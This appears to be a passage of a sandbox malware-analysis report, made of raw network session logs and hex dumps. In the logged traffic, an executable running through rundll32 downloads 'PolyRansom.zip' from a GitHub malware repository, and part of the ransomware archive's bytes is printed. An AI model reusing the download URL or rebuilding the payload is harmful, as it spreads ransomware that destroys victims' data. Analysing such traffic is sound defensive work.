                                                                                                                                                    2022-09-29 12:58:59 UTC2307INData Raw: 42 9c 8f 6f 17 89 93 78 eb 53 bd c0 f2 e5 98 a6 71 68 6d 34 b5 19 cf 7c e6 ee ae f5 a8 0b cc 71 b5 b0 80 2b 49 c4 2b 51 40 e9 5d f2 f6 0a 56 c5 dc b9 f5 cb 98 7d bf 5f 2e c7 9d e0 f8 18 7b ba 56 1c af 6e b0 24 af 8e 3e 85 f0 47 60 58 84 27 f8 fb 9a 02 51 c9 40 f5 a3 61 10 a6 ef 36 db d9 9f 63 b6 3d a7 95 db dd 70 7b da ec 06 51 95 75 d6 b3 47 b9 28 2a ec 40 d6 1b 28 53 bf a5 7b 51 a7 1b dc 67 c3 95 63 2e 4a 35 56 a9 c6 da a5 49 f0 76 6c 64 b8 70 ea d0 59 30 7f ed 0b bf ed da d2 e6 d7 24 ee 79 1a 4b 94 23 2b da 2c ee 75 88 b7 87 ad 5e 6b a1 a3 51 d2 e5 f3 f5 84 38 db 2f ff 87 f0 50 ae 0f 20 c3 87 b1 e4 a0 62 0e a4 5c 5b 71 c2 e0 4a 95 13 52 9a b4 35 80 1d 65 d3 d6 11 d3 51 a3 a3 97 48 2d ab 82 c8 20 68 f1 c7 5d b7 5e 79 ff 86 b5 a4 21 19 d1 c3 10 9a 2f ea
                                                                                                                                                    Data Ascii: BoxSqhm4|q+I+Q@]V}_.{Vn$>G`X'Q@a6c=p{QuG(*@(S{Qgc.J5VIvldpY0$yK#+,u^kQ8/P b\[qJR5eQH- h]^y!/
                                                                                                                                                    2022-09-29 12:58:59 UTC2323INData Raw: d6 08 63 97 86 aa af 17 a8 1f 43 98 ce c0 b0 d1 e7 a8 25 45 14 80 44 d5 08 70 72 7e 78 a8 75 de 6d f5 50 05 1c 48 59 67 5e ac 43 24 46 48 01 4e f6 74 1c 36 0f 51 f1 42 2a a0 27 35 aa 15 b0 7e f9 28 5c 40 7b f9 d4 49 8b e8 dd 24 06 76 4b e3 29 63 f6 6d ca f0 f2 6b 93 cd e6 d8 df 06 d9 03 c6 8c 55 e7 4d 5b 81 b1 68 1a 7f 96 16 7f a7 17 bc b4 4a a0 ee 95 d4 ab 51 33 58 e5 fe 77 2e 58 76 bd 48 1d 4c f7 1c fe 8a 22 91 3a 26 73 db 65 5b ef 4f 0b 7b a9 c4 6c 90 b1 7d 27 70 08 fb 9a 8b 41 38 e2 39 91 d1 e6 a6 10 c0 fe fd c9 1a 98 62 06 37 10 e0 9e ec db 54 33 db a9 bb 84 92 d8 ad 66 de 29 53 06 a3 35 17 0b 83 f7 5f 41 c3 a0 05 41 5f 66 09 82 ab dc d3 00 6a 87 86 7b 23 50 38 17 0c 9e 1b ea ab 03 ce 31 14 f7 96 81 4e 9d 93 37 f3 63 86 15 01 d9 5e 2e ad 02 2b 6c e1
                                                                                                                                                    Data Ascii: cC%EDpr~xumPHYg^C$FHNt6QB*'5~(\@{I$vK)cmkUM[hJQ3Xw.XvHL":&se[O{l}'pA89b7T3f)S5_AA_fj{#P81N7c^.+l
                                                                                                                                                    2022-09-29 12:58:59 UTC2339INData Raw: e8 a3 bb 3f ec 00 41 50 f9 32 44 c8 4c 7b 66 15 de 86 75 06 e9 05 9c 51 fc b8 69 d5 14 32 0b 97 6a f6 dd ec 37 e9 ef 0e d3 64 07 80 df b7 b5 10 e4 05 88 dd 2d 51 30 46 dd 5a 2a a4 24 25 31 5b 7f 04 32 40 70 3a 0c 85 c9 81 21 e6 44 c6 42 64 cc 9b 01 4e cc ba f7 0d 62 95 c2 7d 83 2a 77 22 30 75 aa 1b 15 03 c2 8a 7d bc 8b 19 ca 5a e8 03 61 8d e9 f2 58 8d 39 a6 ff 7c 79 8d f2 82 53 f2 54 77 04 b1 dd 7b 9d 45 d6 7a 4d dc c0 d3 be 34 9c 4c 1a d0 0e a5 92 84 6d bd ce cc 40 b6 e9 57 66 86 29 da 01 56 ac 56 96 d0 ad 01 e3 21 35 73 b6 6a 02 40 ca f8 14 cc e5 e3 2a d9 5f 40 df cd c5 f9 05 52 6b 2d 08 9a 83 37 5a 37 cd 7a d2 97 21 81 9e f6 17 e9 f6 db 46 52 ce cc a2 76 b0 6e bc 79 83 ea 5b 6d 61 fe eb ef 59 77 b1 b0 f9 3a ff ef e6 ab 8e 75 24 fb 7f 74 b1 c7 92 65 8f
                                                                                                                                                    Data Ascii: ?AP2DL{fuQi2j7d-Q0FZ*$%1[2@p:!DBdNb}*w"0u}ZaX9|ySTw{EzM4Lm@Wf)VV!5sj@*_@Rk-7Z7z!FRvny[maYw:u$te
                                                                                                                                                    2022-09-29 12:58:59 UTC2355INData Raw: 85 1e 89 cf 47 14 b9 f7 4e 41 dd 56 3a d5 0b 13 13 1b 68 38 6e ef 83 4f 2a 3d 7a 0c 31 4e 8a 2a 17 81 45 fb 39 f2 14 a9 25 d7 c2 da 60 24 6e 4a a1 d5 fc cb 6c 19 d1 56 ad 5c ce 9d a2 eb 92 50 10 54 35 04 28 8b 54 70 4f e4 c9 92 f0 2c de 34 20 ad e8 29 fc c1 01 3a 63 6d 82 31 6e 7b bc 42 5c 0f eb 32 44 8b ef b1 47 c3 10 fd 01 ad c0 78 f7 53 57 d3 49 d2 c3 68 7b c0 64 d0 44 b4 43 14 db fb d4 36 38 f8 0b 3e e8 0e 40 e3 96 b2 1e 23 8c 70 8f 04 db 1a 0f fd 9a 84 e4 8b 3e 7e 72 09 c0 ac ec 16 ec 75 5e 56 3e 4e a4 85 60 5d 37 cf 0a fc e7 0f 32 cf 68 fb 99 42 5d 0f b6 88 d6 1f 54 e2 97 2c 6f 0e a7 be 5a ba 0c 95 72 5e 2e 18 1c c1 19 c7 d4 eb d3 46 cc 2e a2 29 b2 46 66 40 85 b1 ce 2e 47 3e a9 a4 38 8a 63 0e 88 4d c8 c4 7b c8 15 ca 03 b0 d5 c1 d7 09 79 7f 37 a4 1d
                                                                                                                                                    Data Ascii: GNAV:h8nO*=z1N*E9%`$nJlV\PT5(TpO,4 ):cm1n{B\2DGxSWIh{dDC68>@#p>~ru^V>N`]72hB]T,oZr^.F.)Ff@.G>8cM{y7
                                                                                                                                                    2022-09-29 12:58:59 UTC2371INData Raw: a6 8f 02 f0 0a 68 3b 6f a7 ff fd 55 71 89 e6 13 fb 33 e4 3c 96 59 6f 57 24 d7 45 2a d2 f5 1a f7 db 4b 3b dc 2f ea 93 d3 cd 0f 5d db 51 80 20 0c d9 5e a3 3e d6 72 79 a4 c3 95 90 53 3a 44 6d e5 5d 06 a1 a8 f6 09 e7 49 d8 b2 81 fc 8e ac 51 b7 d7 ab 8f da dd d9 67 08 35 0a 8b f6 26 ac 8c d7 a6 50 ec 52 58 29 55 be 5b 7e 39 e0 06 81 2a 03 3d fd 79 45 e2 d0 52 2e d6 18 ad 6d 4c db 9b b8 e7 5d 7c c3 41 47 73 73 1d 9c 14 2a 6c e3 da 39 de 0c eb 2e 43 28 bf 07 d4 b7 5f e4 04 f5 f1 2d 65 90 92 2b bb a3 e6 05 2a 1a 20 c0 bf a3 e6 fd 14 b9 fd 1b bd 6d f1 27 90 ca 60 86 48 ab d2 98 14 6b 92 a7 2e df 66 7f 4c eb 29 ed 31 8f 6d ae 43 0a fd a8 1b d5 1f 31 a0 d7 c8 23 8d d3 91 03 8a 6d ca 7b 42 af 29 52 90 52 dc 13 51 e7 e7 77 fd 9c af 1c c7 3a e1 ad 40 b4 41 7a b8 12 55
                                                                                                                                                    Data Ascii: h;oUq3<YoW$E*K;/]Q ^>ryS:Dm]IQg5&PRX)U[~9*=yER.mL]|AGss*l9.C(_-e+* m'`Hk.fL)1mC1#m{B)RRQw:@AzU
                                                                                                                                                    2022-09-29 12:58:59 UTC2387INData Raw: ce cf 69 ba 7b f7 03 26 f2 08 ed b3 40 e5 36 21 3d 6d 85 7a d4 0e c4 b6 0e b4 f4 05 e5 84 f3 48 5c 05 42 c7 6d 14 2c 21 a9 f6 05 1b 97 65 df 07 c7 10 e9 a9 d5 10 14 4a 5b 0b ed 99 a6 12 ad 4f ad 36 cd dc d8 f1 e7 b6 78 ff ed 88 f5 9b 9d 0b f1 55 c5 5f 14 ef 33 70 51 b0 e6 7d c6 36 b9 07 b3 89 45 6b f1 41 0a ee 0d 23 dc be b6 c2 24 2a e4 7c a2 ad fe 6a a7 9e 79 3c 44 cd b6 56 88 c7 b6 71 25 d8 27 b0 bb 99 b2 9e 62 f5 10 b5 fc 4b 72 e9 fd e8 a1 4e bc c9 b9 c2 67 e7 08 b6 96 8f 72 b9 4b 1a 22 56 13 87 75 c7 14 78 dc 39 49 7e 39 bd ad 91 08 d4 20 2a 28 91 0e 5f 9a c5 6b e9 81 25 ba 78 6c aa 57 34 28 89 bc b4 78 79 14 2d 88 04 9f fd ff 9e 55 3e 0a fc a8 7e 4b 2d 2d 79 87 e7 db 98 73 8e ab 58 ed 36 17 ab 3e 37 eb b6 4a c4 dc a4 95 e5 1b 8d 72 b3 00 89 07 a0 b1
                                                                                                                                                    Data Ascii: i{&@6!=mzH\Bm,!eJ[O6xU_3pQ}6EkA#$*|jy<DVq%'bKrNgrK"Vux9I~9 *(_k%xlW4(xy-U>~K--ysX6>7Jr
                                                                                                                                                    2022-09-29 12:58:59 UTC2403INData Raw: b4 54 bb d7 3b d4 dc 5c dd df 5d a5 4a 7f 1f 42 b6 e5 9e a7 50 c3 f1 f1 36 a2 db 29 ad ad 26 75 e0 92 0c d3 d7 ae 63 80 02 6a 77 2c d7 59 c7 f3 fa 1e c4 67 d9 0c 07 14 86 62 32 a7 37 b9 82 2d d7 7e 6e dc ad bb 0e f4 dc 33 95 8e ac 00 33 74 29 fb 8f 95 80 4e b9 2b 94 74 02 b2 7d 15 b1 de a8 cc e8 1a d3 74 da 34 fd 79 e5 c7 07 4a c5 a0 a4 8e 87 9f ca 46 84 40 f5 8d 01 4b 66 0a d0 2c b8 24 9b f4 f7 b8 26 8e 21 82 a2 eb 19 ea ff f5 09 19 8a 1b 56 72 45 bb 9d 25 38 b6 88 96 93 e2 40 e5 32 47 af 15 8a 8b f4 5c b1 a7 d6 e7 77 5a bb 9f 21 84 69 2b 1b 43 38 d0 79 95 59 c6 13 33 28 8d 4e e0 75 7c fc 90 82 80 d7 86 8d 79 9f 61 20 ef c2 40 37 ea a4 bc 23 cb 74 6e 42 9c 55 29 58 f5 7d c7 46 07 fe 67 8a 53 99 08 13 f7 62 c4 29 5f 34 3a 89 8f 29 75 db 31 4d 37 27 37 c5
                                                                                                                                                    Data Ascii: T;\]JBP6)&ucjw,Ygb27-~n33t)N+t}t4yJF@Kf,$&!VrE%8@2G\wZ!i+C8yY3(Nu|ya @7#tnBU)X}FgSb)_4:)u1M7'7
                                                                                                                                                    2022-09-29 12:58:59 UTC2419INData Raw: 3e 3f 53 7a 4f 8a 20 50 a7 01 6f 31 d7 fc 42 78 a1 d5 8a 93 37 19 f2 c5 f5 11 40 1f c5 63 2e 25 c9 58 a2 4b 78 69 b9 dc 82 28 15 ab 60 7a c7 a6 6c e3 1d bf 3a f5 f9 bc 06 f0 fe c5 fe 21 8f 19 d3 1d ce df 64 58 67 74 21 43 98 c2 3f 34 dd 9c e3 89 91 82 ab 60 f6 a1 8d 2c 57 3e cd 1f 81 2f c0 b2 b7 ba 70 9c 3e 79 3f 18 88 9e f7 80 46 96 0d e5 64 4a 60 03 2c d9 12 5b 97 e8 04 80 d7 28 aa 8d 5a 41 fe f2 dd 2c b2 47 d1 f8 0a b7 ec 90 2f d2 2d 0e 03 d1 28 78 c7 ff 22 9a 2c 2a b1 62 4b ad 6b 9c 29 20 b5 59 07 98 b8 0e b8 7a b3 cf 98 4a 47 ef 63 00 89 03 5e 26 57 2a 52 52 40 b7 96 7b 1e a3 07 bd 58 42 ab 67 b8 4a 9f 42 9d 69 ba be 56 29 fd b4 ab 09 46 4b 23 3d 6e ff 6c 6a 14 bf 12 2f a8 47 ff 68 3b 77 97 67 43 45 de 43 00 c8 8c bd 72 6b 39 3b fe 67 ce ec 67 d9 37
                                                                                                                                                    Data Ascii: >?SzO Po1Bx7@c.%XKxi(`zl:!dXgt!C?4`,W>/p>y?FdJ`,[(ZA,G/-(x",*bKk) YzJGc^&W*RR@{XBgJBiV)FK#=nlj/Gh;wgCECrk9;gg7


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    41192.168.2.349728140.82.121.3443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    2022-09-29 12:58:59 UTC2420OUTGET /Endermanch/MalwareDatabase/raw/master/ransomwares/PolyRansom.zip HTTP/1.1
                                                                                                                                                    Host: github.com


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    42140.82.121.3443192.168.2.349728C:\Users\user\Desktop\07bb0738.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    2022-09-29 12:58:59 UTC2420INHTTP/1.1 302 Found
                                                                                                                                                    Server: GitHub.com
                                                                                                                                                    Date: Thu, 29 Sep 2022 12:57:06 GMT
                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                    Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                                                                                    Access-Control-Allow-Origin: https://render.githubusercontent.com
                                                                                                                                                    Location: https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/ransomwares/PolyRansom.zip
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                                                                                    X-Frame-Options: deny
                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                    Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                    Expect-CT: max-age=2592000, report-uri="https://api.github.com/_private/browser/errors"
                                                                                                                                                    2022-09-29 12:58:59 UTC2421INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 62 6c 6f 63 6b 2d 61 6c 6c 2d 6d 69 78 65 64 2d 63 6f 6e 74 65 6e 74 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 6f 62 6a 65 63 74 73 2d 6f 72 69 67 69 6e 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e
                                                                                                                                                    Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; block-all-mixed-content; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com objects-origin.githubusercontent.com www.githubstatus.


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    43192.168.2.349729185.199.108.133443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    2022-09-29 12:59:00 UTC2423OUTGET /Endermanch/MalwareDatabase/master/ransomwares/PolyRansom.zip HTTP/1.1
                                                                                                                                                    Host: raw.githubusercontent.com


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    44185.199.108.133443192.168.2.349729C:\Users\user\Desktop\07bb0738.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    2022-09-29 12:59:00 UTC2423INHTTP/1.1 200 OK
                                                                                                                                                    Connection: close
                                                                                                                                                    Content-Length: 133759
                                                                                                                                                    Cache-Control: max-age=300
                                                                                                                                                    Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                                                                    Content-Type: application/zip
                                                                                                                                                    ETag: "c0c6af3e39ace2d58d00154f6e809181a5c813ca80bbf20f38837a99f8056014"
                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                    X-Frame-Options: deny
                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                    X-GitHub-Request-Id: 0800:540D:F52AAF:104AFB9:63359348
                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                    Date: Thu, 29 Sep 2022 12:59:00 GMT
                                                                                                                                                    Via: 1.1 varnish
                                                                                                                                                    X-Served-By: cache-mxp6967-MXP
                                                                                                                                                    X-Cache: HIT
                                                                                                                                                    X-Cache-Hits: 1
                                                                                                                                                    X-Timer: S1664456340.031012,VS0,VE172
                                                                                                                                                    Vary: Authorization,Accept-Encoding,Origin
                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                    X-Fastly-Request-ID: 433358af8ac491af4b27eb7beeba03158fea1172
                                                                                                                                                    Expires: Thu, 29 Sep 2022 13:04:00 GMT
                                                                                                                                                    Source-Age: 0
                                                                                                                                                    2022-09-29 12:59:00 UTC2424INData Raw: 50 4b 03 04 14 00 01 00 08 00 d7 0a 79 45 34 43 fb 93 c7 09 02 00 00 70 03 00 19 00 00 00 45 6e 64 65 72 6d 61 6e 63 68 40 50 6f 6c 79 52 61 6e 73 6f 6d 2e 65 78 65 58 ef 05 c0 b6 8a bd fa 25 51 13 b9 f0 ae cd 11 df 91 dc 43 09 90 1b b5 9d 5d 56 12 5c 94 0e ff 03 d7 23 cf 58 8f c9 fc 7a ca d0 4b c3 a3 27 ee 75 4b 94 c3 a8 37 cb c7 96 47 64 25 16 5f 75 8b 47 35 1c ec 30 cf b0 1c 29 8d 4e 7a b2 68 9f 1a b9 f2 b5 cf 25 fc 5f cb e5 54 45 19 d1 c3 7f 29 0e 9a 48 e3 c3 db bf d1 58 a6 62 90 28 e7 25 5d 5d 44 e2 fd ca 22 88 a8 30 1b 7c 35 9b ac 29 b6 47 ea 2d 68 27 71 fa 3a dc b6 a1 8c 7d 62 f8 31 e2 cb 11 3a ce b9 5e a4 0e 64 ef 92 64 9d 74 fb c5 0a 39 83 f1 e4 aa 69 59 2b df 89 eb ae a0 07 94 80 66 94 95 09 21 bb 66 6e af 73 6b ff d8 aa 55 47 28 e9 d7 86 82 af
                                                                                                                                                    Data Ascii: PKyE4CpEndermanch@PolyRansom.exeX%QC]V\#XzK'uK7Gd%_uG50)Nzh%_TE)HXb(%]]D"0|5)G-h'q:}b1:^ddt9iY+f!fnskUG(
                                                                                                                                                    2022-09-29 12:59:00 UTC2425INData Raw: 17 33 ff c8 39 47 fa ee c0 ad ea dc 38 f8 ca 65 24 cf 8a 2b c5 cb f0 93 b0 18 83 98 05 b8 3f 55 28 df a7 92 90 48 63 1c a0 ad 30 71 3e d5 16 f9 a6 5c 20 0c 28 f2 78 b4 5b f5 38 cd 49 b0 e4 1e 4a 2e e8 98 c3 c7 72 d8 4b ad c6 fc 30 05 aa 65 00 27 a1 8e 77 33 05 dc 07 4f 71 ba 48 a8 1e ed ea 11 5e c8 4c f1 45 3b 4b 58 2c e8 d3 77 12 7c 39 e9 f9 04 7c 9b 2b 04 3e 6e 86 73 4e 63 64 c9 ed 8a 88 e7 f5 61 6d 26 7b 79 07 2f d8 35 b3 d0 42 09 2d 06 d0 21 18 b6 28 e9 65 3f e2 fd f8 09 fd 9f d7 ed 2e 94 a5 7d 9c c7 00 88 56 76 ca f7 10 42 f2 5b d5 9a e1 40 59 83 65 c4 07 4a 6d 0d a2 fc 1a b9 5c 9a 94 c3 1d 80 82 d3 d2 58 e9 e6 c1 fb b2 2b 87 05 ee 54 c5 15 da f8 68 7d c5 de 0f 44 33 a4 27 dd 85 43 4c 6c 43 a5 c6 b4 7a d1 47 68 e3 12 99 3d 46 1b 14 a2 4a de 25 5e 89
                                                                                                                                                    Data Ascii: 39G8e$+?U(Hc0q>\ (x[8IJ.rK0e'w3OqH^LE;KX,w|9|+>nsNcdam&{y/5B-!(e?.}VvB[@YeJm\X+Th}D3'CLlCzGh=FJ%^
                                                                                                                                                    2022-09-29 12:59:00 UTC2426INData Raw: bd f7 c9 f4 a3 b7 91 79 2e c3 11 2b 6e 64 1a 4b ea 6c 91 b8 c3 16 33 e8 77 c9 26 f6 aa 9c e4 5c 8b b0 ad a6 07 e1 9c 46 01 f4 f4 3d 7c 84 81 84 bd e4 25 ee b9 e6 b7 ea 46 c7 48 df 0c f2 a8 8d 48 2b d4 a6 b6 be 2f 8f b7 54 ed 32 64 24 bb b6 6f 0c f9 64 5f f4 f0 d0 f5 8b cb b1 41 2e ba 3b bb e6 08 72 24 c7 bd 52 82 ec e6 db 5d fe af bd 52 6c c0 40 40 c6 8e ec 88 a6 30 2b 7d bf 4e 78 6a bf a7 5d 12 c7 80 00 95 c3 cb 75 0b e0 a4 cd 03 03 23 33 bc 68 bd db db 96 93 55 6f 65 85 39 c8 bb 46 7e 20 07 97 3f b4 9d 62 24 65 19 1d 2a 0f 6b 2d 5e b6 16 ab d2 54 d4 ad 39 00 30 6b 38 cb 5c 9e 9c 59 33 7a 6c f4 cf 56 f5 15 19 36 ee 69 3e 4b 27 5b 83 32 3f 85 2d d4 45 97 9b eb 70 66 93 70 86 9c a1 75 c3 1a 30 71 e0 1c 83 3a d5 fe b2 95 a8 8a bf 92 85 94 b3 24 ae f3 b3 c2
                                                                                                                                                    Data Ascii: y.+ndKl3w&\F=|%FHH+/T2d$od_A.;r$R]Rl@@0+}Nxj]u#3hUoe9F~ ?b$e*k-^T90k8\Y3zlV6i>K'[2?-Epfpu0q:$
                                                                                                                                                    2022-09-29 12:59:00 UTC2428INData Raw: af 2f 92 fa 0b 8a 59 a4 6f 60 d1 13 9c b4 d5 e0 b7 69 9e ff 76 40 97 6e 76 11 06 68 4d 66 6e ed 50 b6 b9 dd fe 17 5d d2 d4 26 1f f4 fa 64 c5 02 49 f1 47 27 02 90 d9 96 37 64 b4 69 c6 0a 3e f4 a9 b4 01 b6 9e 1e c4 1b 50 71 70 f1 b7 5b b4 a7 27 f7 22 c2 3b 90 3f c4 03 c9 07 14 8a c2 6c 28 20 63 99 e2 43 fd f0 3d a9 84 d7 e7 46 1b 81 0d d8 28 7b 24 6b ad dc 66 2b 5d 77 0b 9c f2 d5 1e da 6a ab 0a 12 03 29 8f 21 78 36 9e 5a 15 31 b4 e1 d8 08 4a c0 92 8e 09 62 2f 28 9f 31 29 a3 bf a7 f0 f7 e6 3a c1 f8 09 1e c7 02 5a 03 89 8a 7a 54 b1 96 85 54 7d 57 09 4d 85 2d 00 0e fc 5f db 3a 2d 97 cc c0 60 9e f5 bd 40 d3 53 71 14 eb 51 fb 6f 64 b4 cb c1 6a 71 69 71 95 40 4f 59 25 9e 5d 35 7a ea 15 ca be 91 09 c2 d3 0e cc 89 aa 66 6d cd 7b 0a 19 8d 8f 92 b4 7f 1e 0c 6e fd ef
                                                                                                                                                    Data Ascii: /Yo`iv@nvhMfnP]&dIG'7di>Pqp['";?l( cC=F({$kf+]wj)!x6Z1Jb/(1):ZzTT}WM-_:-`@SqQodjqiq@OY%]5zfm{n
                                                                                                                                                    2022-09-29 12:59:00 UTC2429INData Raw: 36 ad 6f 8f d3 b1 7c 89 65 8d da b4 42 c8 e6 93 75 55 84 96 48 65 bd b9 5c 46 96 d7 72 6e 94 7b 79 95 ba 64 46 9e 00 5e f1 93 09 11 c2 a4 f5 5d 96 4e be 29 2b 8b 67 48 3f 2d c8 04 7f a6 65 d5 13 e2 80 cd 4f 6d ae 8c cd 71 bb b4 33 97 ce 27 1d 51 c9 02 6c 7e a0 3f c3 cb a8 f8 29 b0 e0 72 d6 de df 20 1f 0a 38 2e ea 62 4e 3c f1 ec 7c b5 d0 33 c6 01 9f 65 1d 6a 8c ed c3 23 1d 29 68 01 e4 d9 8e a7 a6 0d 80 0c 31 d7 28 92 f2 f1 61 d4 dc 79 20 ac 2c 3a 4a ee 15 c0 be 79 32 78 09 ad 2e 36 9e bf a6 1a bb 27 b3 8b 97 6c e3 61 c0 c5 66 a7 61 9b 22 87 53 ea 7e 4e c6 a4 b1 69 b2 9c 21 c4 b3 7d 8e ea 52 86 5b f6 36 df 94 5d 2f 82 f6 60 e9 c6 1c 71 d5 79 53 a0 9b 3f 74 33 3a 77 6e b8 58 ef cb 45 39 02 b2 6d cd a0 a6 b5 39 8c 7f e5 d7 ea 0e f4 c0 dd 87 30 ea f9 2b a4 92
                                                                                                                                                    Data Ascii: 6o|eBuUHe\Frn{ydF^]N)+gH?-eOmq3'Ql~?)r 8.bN<|3ej#)h1(ay ,:Jy2x.6'lafa"S~Ni!}R[6]/`qyS?t3:wnXE9m90+
                                                                                                                                                    2022-09-29 12:59:00 UTC2430INData Raw: 88 8d 3b 50 8e 4f a5 ce 06 b4 a0 28 e3 90 11 fd a0 db 69 5c df 92 a2 d7 58 4f f8 f4 55 60 6f b6 4d a6 49 1b f1 d9 cf 7f b8 3f a2 74 b6 8a 02 33 3d d3 cb 46 64 57 02 f3 f4 78 04 d0 60 30 f3 c6 93 02 05 c9 74 c0 0d b2 2b f1 42 2c c0 da 6d a6 67 ff a1 f5 e7 fd da 55 1f 0e e0 15 26 a7 55 43 f4 22 31 e5 9e 50 13 a4 f5 f9 1f 36 21 5d 0c 45 0e 70 0a c3 f6 3e 14 b0 65 b3 b7 a8 f4 d1 a6 be 9a 1a 40 c6 3d 06 81 60 f5 7b 32 81 60 e7 04 d1 3f 0e 50 80 f7 5d 82 0f 21 3d e1 3b cc a5 40 2f 86 4d 41 09 7f 71 f0 c3 1c 98 29 95 53 49 ae fb 9c e3 91 0d fe 5d d6 bd 67 49 f2 39 4b e5 29 bb d9 02 63 3e ed bf ba 32 85 96 68 4d 19 8d 4e a7 37 13 b7 f4 74 cc 77 10 a1 5f f3 69 9a bc e7 84 d8 e5 90 91 c7 29 64 c4 82 13 d5 2b 4f b9 a9 a7 39 6d 4d ba 61 8c 82 8f c3 01 ae 61 b2 a8 b4
                                                                                                                                                    Data Ascii: ;PO(i\XOU`oMI?t3=FdWx`0t+B,mgU&UC"1P6!]Ep>e@=`{2`?P]!=;@/MAq)SI]gI9K)c>2hMN7tw_i)d+O9mMaa
                                                                                                                                                    2022-09-29 12:59:00 UTC2432INData Raw: 58 4e 59 50 68 be fa e0 fc dc c5 7d fb 22 db 08 a8 cd 83 fe 14 3b 85 62 f3 9f 8b 2c f8 08 a7 69 e0 39 44 b7 e7 e1 e7 2b af c9 d0 09 eb 96 b8 d1 b0 0e 30 55 e5 35 e8 d1 96 5d 18 8c c4 8b 6b a0 63 97 c0 21 41 19 f2 b7 57 f5 0f d6 44 64 7e f7 5f ba 82 4d ca a9 08 d3 b6 31 ee ad df fe 76 a7 ab 04 f3 36 e5 0d 89 bf 8c a0 00 8c ff 7e 27 c2 13 a6 0f 87 94 5f 75 99 c3 86 2f 12 26 0c b5 a8 ff 6e c5 0f eb 20 be 28 83 38 60 8d 18 bc 8d ab 56 37 76 fe 16 1d 24 fc c3 ff 22 76 53 21 29 7d 6f c9 69 a6 8b e9 35 ef 51 95 bf c2 df da 7f dd 26 f0 4e 7d 8b da 21 98 d2 6a 57 75 87 37 0e 5e b7 f9 32 3c f2 17 fc de 22 65 3f 4c 6d 84 a1 dc 7c 7b 84 05 82 6a 54 79 a8 5f fd a3 e8 b9 67 9f 37 b1 7a a5 4e b0 01 b1 e3 d2 49 4e b6 a1 32 bf 87 e2 77 8b 26 e6 fd f8 ea 88 40 f2 67 31 a7
                                                                                                                                                    Data Ascii: XNYPh}";b,i9D+0U5]kc!AWDd~_M1v6~'_u/&n (8`V7v$"vS!)}oi5Q&N}!jWu7^2<"e?Lm|{jTy_g7zNIN2w&@g1
                                                                                                                                                    2022-09-29 12:59:00 UTC2433INData Raw: 17 4f 9f 16 79 0e e3 11 02 3c 20 eb 0b ad ec b9 43 6d b0 7d 80 8c 8a c3 5d 96 d3 d9 40 6f 7e 0f 47 88 d7 e7 85 4c 3e 7d 24 92 01 2e 4c 3a 5f 68 df 84 25 c5 93 c2 76 1a 38 2d 7a 2b 46 a7 49 ee 22 c1 88 ac c9 a5 ae 6d e3 30 7d db 13 54 04 b4 f6 7b c6 5c 6a 38 c4 34 20 1e 5d 91 82 80 eb 5e be 6b 6c f4 90 14 d1 3d 15 12 3f 6f 2e 80 f2 7c 36 55 6f 95 10 13 59 9f 60 42 cb 7f fb d0 17 3b aa 8a 0b 33 e2 a0 ad a8 a0 2c aa 1b 45 d0 9e 41 e1 59 7d 76 bf 97 a1 58 d6 e9 8e fb 99 11 91 c4 aa ee 4e 8f 4f 83 7d ef ca e6 6f b0 3f 73 b2 d4 d9 30 7d cf 0e f6 0c 8e d4 63 8f ba f2 f8 2e b0 53 b0 2e 15 1d aa 4d 9a 3c bc 15 a3 72 99 63 b7 42 40 1e ef 55 95 e9 36 00 42 14 8e 79 42 32 c2 65 48 ea e0 48 4d a9 fd bc 1a 7e cb 28 45 00 a9 db f3 d2 7c 22 e9 42 87 f4 a8 84 1f 64 9a 14
                                                                                                                                                    Data Ascii: Oy< Cm}]@o~GL>}$.L:_h%v8-z+FI"m0}T{\j84 ]^kl=?o.|6UoY`B;3,EAY}vXNO}o?s0}c.S.M<rcB@U6ByB2eHHM~(E|"Bd
